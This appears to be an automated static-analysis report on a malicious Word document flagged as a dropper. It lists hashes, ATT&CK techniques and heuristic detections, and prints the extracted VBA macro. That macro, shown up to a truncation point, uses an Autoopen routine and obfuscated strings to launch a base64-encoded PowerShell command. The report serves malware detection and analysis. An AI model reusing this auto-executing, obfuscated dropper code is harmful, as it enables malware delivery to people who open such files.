Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f2e119823ecb7aa1…

MALICIOUS

Office (OLE)

Size: 120.5 KB
Created: 2018-06-12 16:57:00
Authoring application: Microsoft Office Word
First seen: 2019-01-31
MD5: fac449c087c41843cbb7b6d7a1dc3973
SHA-1: fcc419d88f9c0697a30f449310aef0ce45552f1c
SHA-256: f2e119823ecb7aa1bfc1286c5115061268c68c7e00a1ae824af2f0fa3afe7b4e
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059 Command and Scripting Interpreter
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample contains a VBA macro with an Autoopen subroutine that calls the Shell() function. This indicates that the document is designed to execute arbitrary commands when it is opened. The ClamAV detection 'Doc.Dropper.Agent-6582866-0' further supports its malicious nature as a dropper. The VBA code attempts to construct and execute a command, likely to download and run a second-stage payload.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6582866-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6582866-0
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    The compiled VBA/cache stream contains an auto-execution token together with shell, download or object-execution tokens. This catches p-code-only macro documents, or documents whose source extraction failed, where no visible source is available.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface; on its own it does not attribute the sample to a downloader or to a parser CVE.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 14354 bytes
SHA-256: 489464b6f857951377de58ae34b851b6917248275d23dbcb6651f85796e5d0a7

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "dZYNlkqmVlnSTo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function YVSaMwprp()
On Error Resume Next
dkCXw = Tan(39429)
OsMHK = IfYHXt
rDJcfm = CDbl(VcnRVj)
JNwur = wlqzC
lXnJiO = Hex(BZZbZ * ChrW(LfhlFv + Int(bozRZM * Rnd(60803)) * oFNKa * Log(64638 * RhTFD - hhjmY + Fix(51))))
frOzl = Tan(8130)
WzXVj = Tan(41638)
fNTMRz = LOASz
QtHQfB = CDbl(ziaFc)
JLDtL = jUpUNW
ZrUdO = Hex(lMAcpH * ChrW(iLjAnN + Int(LqzHUo * Rnd(64812)) * XaYtt * Log(21285 * SiBLXr - IiOlVC + Fix(51))))
kphAm = Tan(18752)
YVSaMwprp = PQXYU + Shell(wUYPirUEHzj + Chr(jYjlQOo + vbKeyP + OnWzJaIkz) + "owers" + lwYWqPK + cGAOOW + hUPvhqRSlZ + NZCjzLtKR + bJWklbffJkO + NfkhASQMB, 74929 - 74929)
sNIZAV = Tan(78284)
DvOiG = EwbptR
QtjSfs = CDbl(lrtGBs)
RtlXWE = iSXqvf
qGKtsB = Hex(UYGUcC * ChrW(MBHdNS + Int(FpRXMw * Rnd(72136)) * McjMGv * Log(70982 * NIrwwU - CtCuSQ + Fix(51))))
NhNsl = Tan(31402)
End Function
Sub Autoopen()
On Error Resume Next
WfCqtM = Tan(59333)
QvsbSu = WUqkL
dJDTK = CDbl(OBzNKU)
rdoHDI = RdHCqz
sLsBA = Hex(dsWwX * ChrW(PPjQih + Int(bCrhM * Rnd(75712)) * LzACBd * Log(24841 * WqGLJP - wGqkU + Fix(51))))
jiMZVi = Tan(42803)
YVSaMwprp
BdjOZ = Tan(88014)
rUztVn = sJWXrO
krbSi = CDbl(Oodfuq)
VNazk = jHmtq
FqpCCz = Hex(IOQlFw * ChrW(SRDrRz + Int(fYfjZm * Rnd(42661)) * wwwkTd * Log(71143 * laiDi - FbUBuD + Fix(51))))
EvbrU = Tan(49948)
End Sub


Attribute VB_Name = "JTdLUaSRn"
Function lwYWqPK()
On Error Resume Next
OdjKzq = Tan(44865)
GLqTp = WSBqYV
GYRzt = CDbl(Gsqfrv)
JNbAzC = jwRpV
fGBXE = Hex(rWIERM * ChrW(wRRQf + Int(XthIrB * Rnd(82643)) * CbJGc * Log(53810 * OzrTbu - ZBIKn + Fix(51))))
FCRjmp = Tan(96597)
IknVAzA = "HeLL -e IAAoAC" + "AAT" + "gBlAHcALQBvAEI" + "AagBFAGM" + "AVAAgACAAUw" + "BZAHMAVA"
zzKVN = Tan(50165)
vwwokY = SawDFT
fAjNv = CDbl(AJdUn)
LQBjzN = PdCKW
WXkrj = Hex(jizRzd * ChrW(SIplV + Int(AHNRQt * Rnd(98108)) * lEqdqK * Log(21078 * uQRtm - wLwED + Fix(51))))
vLZsjj = Tan(41514)
lfPiRXlU = "BFAG0A" + "LgBpAG" + "8ALg" + "BjAG8AT" + "QBwAFIARQBzA" + "FMASQBPAG" + "4ALgBkAGUA"
JFTwks = Tan(96853)
JoGSzt = ZUcrw
CSMpJ = CDbl(ZiwwJo)
PowTI = FYBKzk
CwAXEp = Hex(nHmGI * ChrW(wYvKsw + Int(iiacAT * Rnd(94338)) * jAIPFR * Log(84293 * darUQb - BqLhw + Fix(51))))
crRAGJ = Tan(46536)
ULHkUvcWvaI = "ZgBMAEEAdABlAFM" + "AVABSAGUAQQ" + "BNAC" + "gAWwBzAFkA" + "Uw" + "B0AG" + "UA" + "bQAuAEkAT"
YXlsh = Tan(7337)
irCJG = SkAcNG
ZlplA = CDbl(HJqOw)
THFDG = jXAXzI
plKGR = Hex(sDBzm * ChrW(zrWwzn + Int(DBmoMh * Rnd(89060)) * iiVBm * Log(62584 * LYwCZ - GERJSU + Fix(51))))
kMbCk = Tan(44692)
TmNDG = "wA" + "uA" + "G0ARQBtAE" + "8AcgB5AHMAVABy" + "AGUAYQBNAF0AI"
XDzzZ = Tan(44495)
NVjvA = ljzzv
lzwUi = CDbl(MnPSGS)
PbqHa = dCSsil
SSUEO = Hex(HWlHai * ChrW(DMjIv + Int(NdkZv * Rnd(47419)) * ASLSE * Log(26682 * PbuSKD - LvdUQZ + Fix(51))))
wQSJz = Tan(39217)
szQIo = "AB" + "bA" + "HMAWQBzAFQA" + "RQBNAC4"
kisZf = Tan(84645)
pKTCMz = bSQws
CiHFfz = CDbl(EBsIH)
LitBti = DVkJS
ZDUwB = Hex(FlVCa * ChrW(tjcXoS + Int(vToZi * Rnd(32792)) * Thfjw * Log(95106 * cZMjCq - CIpcSN + Fix(51))))
wijhRw = Tan(44191)
iniWnZjk = "AQwBvAG4AVgBlA" + "FIAVABdADoAOg" + "BGAFI" + "AbwBt" + "AEIAQQBzAGUANgA" + "0AHMAVAByAEkATg" + "BnACgAIAAnAFYA"
lilhis = Tan(46159)
pDdAR = QnlbO
KwwPDX = CDbl(wwzjw)
roizV = DiCAY
NhsSsv = Hex(kiZmhW * ChrW(GYZGpX + Int(kaRipQ * Rnd(28569)) * OHwYa * Log(81403 * cjFDqO - RBAbrG + Fix(51))))
EwKBKc = Tan(14479)
zOzdUSdz = "WgBCAG" + "IAVAA4AEoAQQB" + "FA" + "EkAWAAv" + "AHkAagA0A" + "DAASwBVAF" + "QAWgAxAGk" + "AQgA0AGEA"
jDfbZP = Tan(35030)
IwnQvt = mhQwI
hOZIf = CDbl(LoWPO)
CwCYOo = zOrfD
jKvXUu = Hex(wKCpFS * ChrW(FGzmjZ + Int(tzzNSc * Rnd(54600)) * CpiVS * Log(91552 * PQCVkj - uNSvtQ + Fix(51))))
OFwdIp = Tan(26121)
ZLEPSIU = "VQB4AEUASwBWA" + "DQAaABhAEEAMw" + "A0AFkARwBLADI" + "AeQA5AGc" + "AdQBiAEg" + "AZgByAG"
... (truncated)